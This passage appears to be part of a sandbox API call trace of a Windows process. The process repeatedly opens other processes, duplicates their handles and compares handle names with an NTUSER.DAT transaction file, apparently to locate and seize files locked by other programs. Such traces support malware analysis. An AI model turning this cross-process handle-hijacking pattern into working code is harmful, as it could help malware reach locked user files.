lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.638] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.639] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.639] CloseHandle (hObject=0x1e4) returned 1 [0165.639] _wcsicmp (_Str1="\\Credentials", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0165.639] CloseHandle (hObject=0x194) returned 1 [0165.639] CloseHandle (hObject=0x1e8) returned 1 [0165.639] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.639] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x608, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.639] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.640] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.641] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.641] CloseHandle (hObject=0x1e4) returned 1 [0165.641] _wcsicmp (_Str1="\\Credentials", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0165.641] CloseHandle (hObject=0x194) returned 1 [0165.641] CloseHandle (hObject=0x1e8) returned 1 [0165.641] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.641] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x738, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.641] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.642] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.643] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.643] CloseHandle (hObject=0x1e4) returned 1 [0165.643] _wcsicmp (_Str1="\\CatalogChangeListener-1e0-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0165.643] CloseHandle (hObject=0x194) returned 1 [0165.643] CloseHandle (hObject=0x1e8) returned 1 [0165.643] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.643] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x740, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.643] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.644] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.645] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.645] CloseHandle (hObject=0x1e4) returned 1 [0165.645] CloseHandle (hObject=0x194) returned 1 [0165.645] CloseHandle (hObject=0x1e8) returned 1 [0165.645] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.645] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x744, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.645] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.646] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.646] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.646] CloseHandle (hObject=0x1e4) returned 1 [0165.646] CloseHandle (hObject=0x194) returned 1 [0165.647] CloseHandle (hObject=0x1e8) returned 1 [0165.647] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.647] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x74c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.647] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.647] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.648] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.648] CloseHandle (hObject=0x1e4) returned 1 [0165.648] CloseHandle (hObject=0x194) returned 1 [0165.648] CloseHandle (hObject=0x1e8) returned 1 [0165.648] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1e8 [0165.648] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x750, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.648] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.661] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.662] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.662] CloseHandle (hObject=0x1e4) returned 1 [0165.662] CloseHandle (hObject=0x194) returned 1 [0165.663] CloseHandle (hObject=0x1e8) returned 1 [0165.663] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0165.663] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.663] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.664] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.665] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.665] CloseHandle (hObject=0x1e4) returned 1 [0165.665] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.665] CloseHandle (hObject=0x194) returned 1 [0165.665] CloseHandle (hObject=0x1e8) returned 1 [0165.665] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0165.665] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x88, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.665] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.666] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.667] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.667] CloseHandle (hObject=0x1e4) returned 1 [0165.667] CloseHandle (hObject=0x194) returned 1 [0165.667] CloseHandle (hObject=0x1e8) returned 1 [0165.667] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0165.667] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.667] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.668] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.669] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.669] CloseHandle (hObject=0x1e4) returned 1 [0165.669] CloseHandle (hObject=0x194) returned 1 [0165.669] CloseHandle (hObject=0x1e8) returned 1 [0165.669] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0165.669] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.669] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.670] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.670] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.671] CloseHandle (hObject=0x1e4) returned 1 [0165.671] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0165.671] CloseHandle (hObject=0x194) returned 1 [0165.671] CloseHandle (hObject=0x1e8) returned 1 [0165.671] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0165.671] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.671] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.672] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.672] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.672] CloseHandle (hObject=0x1e4) returned 1 [0165.672] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0165.673] CloseHandle (hObject=0x194) returned 1 [0165.673] CloseHandle (hObject=0x1e8) returned 1 [0165.673] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0165.673] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.673] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.673] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.674] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.674] CloseHandle (hObject=0x1e4) returned 1 [0165.674] _wcsicmp (_Str1="\\LSM_API_service", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0165.674] CloseHandle (hObject=0x194) returned 1 [0165.675] CloseHandle (hObject=0x1e8) returned 1 [0165.675] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1e8 [0165.675] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.675] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.675] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.676] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.676] CloseHandle (hObject=0x1e4) returned 1 [0165.677] _wcsicmp (_Str1="\\lsm.exe.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0165.677] CloseHandle (hObject=0x194) returned 1 [0165.677] CloseHandle (hObject=0x1e8) returned 1 [0165.677] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0165.677] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.677] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.678] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.678] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.679] CloseHandle (hObject=0x1e4) returned 1 [0165.679] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.679] CloseHandle (hObject=0x194) returned 1 [0165.679] CloseHandle (hObject=0x1e8) returned 1 [0165.679] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0165.679] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.679] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.680] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.681] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.681] CloseHandle (hObject=0x1e4) returned 1 [0165.681] CloseHandle (hObject=0x194) returned 1 [0165.681] CloseHandle (hObject=0x1e8) returned 1 [0165.681] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0165.681] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x280, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.681] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.682] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.682] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.683] CloseHandle (hObject=0x1e4) returned 1 [0165.683] _wcsicmp (_Str1="\\plugplay", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 2 [0165.683] CloseHandle (hObject=0x194) returned 1 [0165.683] CloseHandle (hObject=0x1e8) returned 1 [0165.683] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0165.683] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x284, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.683] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.684] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.684] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.685] CloseHandle (hObject=0x1e4) returned 1 [0165.685] _wcsicmp (_Str1="\\plugplay", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 2 [0165.685] CloseHandle (hObject=0x194) returned 1 [0165.685] CloseHandle (hObject=0x1e8) returned 1 [0165.685] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0165.685] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x288, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.685] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.686] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.687] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.687] CloseHandle (hObject=0x1e4) returned 1 [0165.687] _wcsicmp (_Str1="\\plugplay", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 2 [0165.687] CloseHandle (hObject=0x194) returned 1 [0165.687] CloseHandle (hObject=0x1e8) returned 1 [0165.687] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0165.687] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x370, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.687] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.688] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.689] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.689] CloseHandle (hObject=0x1e4) returned 1 [0165.689] CloseHandle (hObject=0x194) returned 1 [0165.689] CloseHandle (hObject=0x1e8) returned 1 [0165.689] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x250) returned 0x1e8 [0165.689] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.689] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.690] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.691] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.691] CloseHandle (hObject=0x1e4) returned 1 [0165.691] _wcsicmp (_Str1="\\umpnpmgr.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 7 [0165.691] CloseHandle (hObject=0x194) returned 1 [0165.691] CloseHandle (hObject=0x1e8) returned 1 [0165.691] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0165.691] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.691] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.692] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.693] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.693] CloseHandle (hObject=0x1e4) returned 1 [0165.693] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.694] CloseHandle (hObject=0x194) returned 1 [0165.694] CloseHandle (hObject=0x1e8) returned 1 [0165.694] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0165.694] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x84, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.694] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.694] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.695] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.695] CloseHandle (hObject=0x1e4) returned 1 [0165.695] CloseHandle (hObject=0x194) returned 1 [0165.695] CloseHandle (hObject=0x1e8) returned 1 [0165.696] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0165.696] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.696] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.699] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.701] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.701] CloseHandle (hObject=0x1e4) returned 1 [0165.701] CloseHandle (hObject=0x194) returned 1 [0165.701] CloseHandle (hObject=0x1e8) returned 1 [0165.702] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0165.702] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x164, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.702] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.702] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.703] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.703] CloseHandle (hObject=0x1e4) returned 1 [0165.703] CloseHandle (hObject=0x194) returned 1 [0165.703] CloseHandle (hObject=0x1e8) returned 1 [0165.703] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0165.703] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x168, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.704] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.704] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.705] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.705] CloseHandle (hObject=0x1e4) returned 1 [0165.705] CloseHandle (hObject=0x194) returned 1 [0165.705] CloseHandle (hObject=0x1e8) returned 1 [0165.705] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0165.705] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x170, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.705] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.707] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.709] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.709] CloseHandle (hObject=0x1e4) returned 1 [0165.709] _wcsicmp (_Str1="\\CatalogChangeListener-294-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0165.710] 